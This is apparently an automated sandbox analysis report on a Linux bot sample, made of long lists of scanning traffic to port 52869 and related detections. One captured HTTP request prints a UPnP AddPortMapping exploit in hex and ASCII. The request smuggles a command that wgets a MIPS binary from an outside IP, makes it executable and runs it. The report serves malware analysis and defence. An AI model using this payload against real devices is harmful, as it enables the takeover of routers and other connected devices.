Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.207.227.142:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.248.163.52:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.222.105.34:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.158.186.18:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.220.193.170:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.191.50.74:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.36.1.76:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.83.137.195:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.212.139.208:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.10.132.199:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.129.196.178:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.37.131.196:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.118.133.111:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.137.46.136:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.129.100.152:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.182.232.188:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.34.246.52:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.122.34.193:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.22.123.137:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.175.60.139:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.73.142.155:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.64.57.114:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.18.30.143:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.44.150.250:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.63.214.81:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.76.166.216:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.86.212.70:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.8.151.225:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.124.230.80:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.73.93.93:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.175.244.249:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.21.182.181:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.41.93.167:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.148.25.211:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.95.227.81:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.206.78.107:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.109.33.121:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.224.20.242:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.38.10.72:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.177.248.153:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.137.142.34:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.216.106.73:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.86.144.184:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.126.102.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.31.222.233:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.192.230.126:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.222.172.219:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.59.210.239:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 45.41.120.2:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 185.69.125.158:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.136.194.56:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.127.224.0:52869
Source: global traffic	TCP traffic: 192.168.2.23:58345 -> 91.86.158.215:52869

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 147.188.30.159
Source: unknown	TCP traffic detected without corresponding DNS query: 124.240.211.158
Source: unknown	TCP traffic detected without corresponding DNS query: 139.81.199.5
Source: unknown	TCP traffic detected without corresponding DNS query: 172.44.129.156
Source: unknown	TCP traffic detected without corresponding DNS query: 34.109.179.78
Source: unknown	TCP traffic detected without corresponding DNS query: 209.66.247.197
Source: unknown	TCP traffic detected without corresponding DNS query: 221.13.21.232
Source: unknown	TCP traffic detected without corresponding DNS query: 20.132.98.102
Source: unknown	TCP traffic detected without corresponding DNS query: 201.142.5.64
Source: unknown	TCP traffic detected without corresponding DNS query: 205.172.121.189
Source: unknown	TCP traffic detected without corresponding DNS query: 149.24.169.36
Source: unknown	TCP traffic detected without corresponding DNS query: 2.13.133.181
Source: unknown	TCP traffic detected without corresponding DNS query: 182.211.75.9
Source: unknown	TCP traffic detected without corresponding DNS query: 100.42.36.252
Source: unknown	TCP traffic detected without corresponding DNS query: 204.42.49.31
Source: unknown	TCP traffic detected without corresponding DNS query: 124.231.9.201
Source: unknown	TCP traffic detected without corresponding DNS query: 63.134.12.8
Source: unknown	TCP traffic detected without corresponding DNS query: 222.6.60.70
Source: unknown	TCP traffic detected without corresponding DNS query: 219.137.252.124
Source: unknown	TCP traffic detected without corresponding DNS query: 72.173.181.142
Source: unknown	TCP traffic detected without corresponding DNS query: 36.188.193.200
Source: unknown	TCP traffic detected without corresponding DNS query: 92.182.202.169
Source: unknown	TCP traffic detected without corresponding DNS query: 185.194.107.102
Source: unknown	TCP traffic detected without corresponding DNS query: 162.38.118.239
Source: unknown	TCP traffic detected without corresponding DNS query: 93.127.100.251
Source: unknown	TCP traffic detected without corresponding DNS query: 163.139.174.213
Source: unknown	TCP traffic detected without corresponding DNS query: 140.108.86.230
Source: unknown	TCP traffic detected without corresponding DNS query: 92.139.121.188
Source: unknown	TCP traffic detected without corresponding DNS query: 76.235.214.28
Source: unknown	TCP traffic detected without corresponding DNS query: 67.73.37.235
Source: unknown	TCP traffic detected without corresponding DNS query: 88.69.252.139
Source: unknown	TCP traffic detected without corresponding DNS query: 135.174.171.248
Source: unknown	TCP traffic detected without corresponding DNS query: 9.107.57.115
Source: unknown	TCP traffic detected without corresponding DNS query: 189.209.154.168
Source: unknown	TCP traffic detected without corresponding DNS query: 37.232.215.25
Source: unknown	TCP traffic detected without corresponding DNS query: 59.35.78.236
Source: unknown	TCP traffic detected without corresponding DNS query: 94.12.187.208
Source: unknown	TCP traffic detected without corresponding DNS query: 97.227.104.95
Source: unknown	TCP traffic detected without corresponding DNS query: 160.164.122.38
Source: unknown	TCP traffic detected without corresponding DNS query: 85.248.242.167
Source: unknown	TCP traffic detected without corresponding DNS query: 72.219.136.178
Source: unknown	TCP traffic detected without corresponding DNS query: 40.0.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 125.84.40.148
Source: unknown	TCP traffic detected without corresponding DNS query: 43.96.203.243
Source: unknown	TCP traffic detected without corresponding DNS query: 36.177.60.96
Source: unknown	TCP traffic detected without corresponding DNS query: 2.43.172.163
Source: unknown	TCP traffic detected without corresponding DNS query: 177.65.50.139
Source: unknown	TCP traffic detected without corresponding DNS query: 93.42.224.4

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 12:07:47 GMTContent-Type: text/htmlServer: lighttpd/1.4.13Content-Length: 399

Source: swOGb2sZYt, 5245.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp	String found in binary or memory: http://194.87.42.3/Anti_Bins/Antisocial.mips
Source: swOGb2sZYt, 5245.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: swOGb2sZYt, 5245.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown

HTTP traffic detected: POST /picdesc.xml HTTP/1.1Host: 127.0.0.1:52869Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6e 69 67 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 38 37 2e 34 32 2e 33 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 20 2d 4f 20 6e 69 67 3b 20 63 68 6d 6f 64 20 37 37 37 20 6e 69 67 3b 20 2e 2f 6e 69 67 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://194.87.42.3/Anti_Bins/Antisocial.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDurati

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal76.troj.lin@0/0@0/0

Source: swOGb2sZYt

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 47692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52122 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 52122
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 52126
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52784 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 52784
Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 52786
Source: unknown	Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45784 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45862 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45708 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 45708
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 45714
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57732 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51942 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35342 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54366 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44238
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 55986
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44272
Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 55994
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44284
Source: unknown	Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44298
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34636 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59940 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44306
Source: unknown	Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49646 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44382
Source: unknown	Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44408
Source: unknown	Network traffic detected: HTTP traffic on port 59242 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44422
Source: unknown	Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44446
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44502
